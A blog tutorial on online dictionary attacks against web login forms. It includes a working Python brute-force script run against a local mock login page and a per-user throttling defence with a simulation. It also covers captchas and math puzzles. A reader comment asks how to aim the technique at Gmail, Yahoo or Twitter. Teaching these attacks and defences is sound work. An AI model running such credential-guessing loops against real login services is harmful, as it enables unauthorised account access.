Dictionary attack

This is a tutorial about how to perform a simple dictionary attack against a login form, and how web-masters can prevent one.

Wikipedia defines a dictionary attack as:

In cryptanalysis and computer security, a dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by searching likely possibilities.
A dictionary attack uses a brute-force technique of successively trying all the words in an exhaustive list (from a pre-arranged list of values). In contrast with a normal brute force attack, where a large proportion of the key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words in a dictionary. Generally, dictionary attacks succeed because many people have a tendency to choose passwords which are short (7 characters or fewer), single words found in dictionaries, or simple, easily predicted variations on words, such as appending a digit.

In this post, I’m going to write a simple script which sends POST requests to the login page and inspects the response of each request. Before I start, let me say that there are many tools which already do this. Two of them are:

1. Burp Suite (its Intruder tool can replay a login form with a word list, which is an online attack like the one below)
2. John the Ripper (an offline cracker: it works on password hashes you already have, not against a live login form)

But what’s the fun in using a tool to crack something? 🙂 The fun part is when YOUR code does it. After all, Code is Poetry (check the wordpress.org footer) 😉

For the demo, I have this login page, which is very similar to my college mail server (or any Horde server). The user-name and password for a successful login are “cs10528” and “remember” respectively. If you provide a valid user-name/password combination, the page displays “Login Successful”; for any other combination it displays “Login Failed”. That difference in the response body is what the attack keys on. So all we need is code that sends POST requests to the login page, and a dictionary from which to pick the probable passwords.

This is the PHP code I’ve written to automate the login process. It reads the “dict.txt” file line by line and uses each line as the password in an HTTP POST request. The code is well commented; the request itself is done with the curl functions. And finally, here is the dict.txt I used for this demo. It has only around 25 words, so that the run finishes quickly. If you are not comfortable with curl in PHP, see this post, which explains the curl basics.

You can see the whole login process in action here.
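The author’s PHP/curl script is linked rather than reproduced on this page, so the following is an added example and not the original code: a Python version of the same loop, run against a small mock of the demo login page that is started in-process, so the whole thing works offline. The form field names `username` and `password`, the path `/login.php`, and the word list embedded in `DICT_TXT` are assumptions standing in for the demo page and the linked dict.txt; the credentials and the two response strings are the ones the post describes.

```python
"""Dictionary attack against a mock login form (added example, not the post's PHP code)."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Credentials and response strings as described in the post.
VALID_USER = "cs10528"
VALID_PASS = "remember"

# Constructed stand-in for the linked dict.txt (the real list is not on the page).
DICT_TXT = """password
123456
qwerty
letmein
welcome
remember
monkey
"""


class LoginHandler(BaseHTTPRequestHandler):
    """Mock of the demo login page: answers every POST with one of two strings."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]      # field name is an assumption
        password = form.get("password", [""])[0]  # field name is an assumption
        ok = (user, password) == (VALID_USER, VALID_PASS)
        body = b"Login Successful" if ok else b"Login Failed"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the mock server quiet
        pass


def start_mock_server():
    """Start the mock on a free loopback port; return (server, login URL)."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/login.php"


def try_login(url, username, password, timeout=5):
    """POST one username/password pair; True iff the page reports success."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        # The attack keys on the difference between the two response bodies.
        return "Login Successful" in resp.read().decode(errors="replace")


def dictionary_attack(url, username, wordlist):
    """Try each word in order; return (password, attempts) or (None, attempts)."""
    attempts = 0
    for word in wordlist:
        word = word.strip()
        if not word or word.startswith("#"):  # skip blanks and comments
            continue
        attempts += 1
        if try_login(url, username, word):
            return word, attempts
    return None, attempts


if __name__ == "__main__":
    server, url = start_mock_server()
    try:
        found, n = dictionary_attack(url, VALID_USER, DICT_TXT.splitlines())
        print(f"found={found!r} after {n} requests")
    finally:
        server.shutdown()
```

Run it directly and it prints the recovered password and the number of requests it took. As the note at the end of the post says, a real Horde login is not this simple: the script would have to carry the session cookie across requests, and the success test would be whatever the real page shows on success, not the literal string “Login Successful”.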

So, how can a web-master prevent these automated logins?

1. Captcha
Adding a captcha stops most automated login scripts, including the one above, because the script cannot fill in the challenge. It raises the cost of an attack rather than eliminating it (image captchas can be solved by OCR or by paid solving services), so be careful about what kind of captcha you choose: quite a few captchas confuse people and scare them away.

2. Math Puzzles
Instead of images, you can ask the user to answer a simple arithmetic question (like “what is 10+15”). This loads much faster and avoids confusion. The caveat is that a question served as plain text is trivially parsed and solved by the same script, so it only stops attackers who have not looked at the page.

3. Maintaining the state in the server
Store the time of the last login attempt for each user; if the next attempt arrives less than 5 seconds after it, block that user for the next 10 minutes. This needs more changes in the server-side code, including a new table to store the login-attempt times. Two caveats: the rule only slows an attacker who is willing to wait 5 seconds between guesses, and because the block is keyed on the user name, anyone who can send two quick requests can lock a legitimate user out of their own account. Counting failed attempts per source address as well limits the second problem.
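The throttling rule in point 3 is easy to get subtly wrong, so here is an added example (not from the post) in Python that implements it with an injectable clock, plus a small simulation that shows both what it stops and what it does not. The class name `LoginThrottle`, the `FakeClock` helper and the in-memory dictionaries are my choices; in a real deployment the same two timestamps per user would live in the new table the post mentions.

```python
"""Per-user login throttling as described in the post (added example)."""
import time

MIN_INTERVAL = 5.0      # seconds: a second attempt closer than this triggers a block
BLOCK_DURATION = 600.0  # seconds: the post's 10 minutes


class LoginThrottle:
    """Records the last attempt per key and blocks rapid retries.

    `now` is injectable so the behaviour can be tested without sleeping.
    `key` is whatever you throttle on: the post uses the user name, which
    also lets an attacker lock a victim out, so a real service would
    usually key on the source address as well.
    """

    def __init__(self, min_interval=MIN_INTERVAL, block_duration=BLOCK_DURATION,
                 now=time.monotonic):
        self.min_interval = min_interval
        self.block_duration = block_duration
        self.now = now
        self.last_attempt = {}   # key -> time of the last attempt that was let through to the check
        self.blocked_until = {}  # key -> time at which an active block expires

    def check(self, key):
        """Return True if the attempt may proceed, False if it must be refused.

        Call this before verifying the password and regardless of whether the
        password will turn out to be right, so the timing does not leak anything.
        """
        t = self.now()
        until = self.blocked_until.get(key)
        if until is not None and t < until:
            return False                          # still inside a block
        last = self.last_attempt.get(key)
        self.last_attempt[key] = t
        if last is not None and t - last < self.min_interval:
            self.blocked_until[key] = t + self.block_duration
            return False                          # too fast: start a block
        return True


class FakeClock:
    """Manually advanced clock used in place of time.monotonic for simulation."""

    def __init__(self, start=0.0):
        self.t = start

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate(throttle, clock, key, attempts, gap):
    """Fire `attempts` login attempts `gap` seconds apart; return how many got through."""
    allowed = 0
    for _ in range(attempts):
        if throttle.check(key):
            allowed += 1
        clock.advance(gap)
    return allowed


if __name__ == "__main__":
    # A 25-word list fired as fast as the script can go: the second request trips the block.
    clock = FakeClock()
    print("fast attacker, attempts allowed:", simulate(LoginThrottle(now=clock), clock, "cs10528", 25, 0.1))
    # The same list with a 5-second pause between guesses slips through the rule entirely.
    clock = FakeClock()
    print("patient attacker, attempts allowed:", simulate(LoginThrottle(now=clock), clock, "cs10528", 25, 5.0))
```

With a 25-word list the patient attacker finishes in about two minutes, which is why a fixed per-user interval is better treated as one layer rather than the whole defence.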

Note:
1. The code posted here won’t work against Horde as-is. In many cases there are cookies and other per-session state to be handled.

2 Comments

  1. Hi,

    Thank you, but I have a question: how do I create the same thing for known servers like Gmail or Yahoo, or websites like Twitter, to practice on using my own account and password to know it’s working?
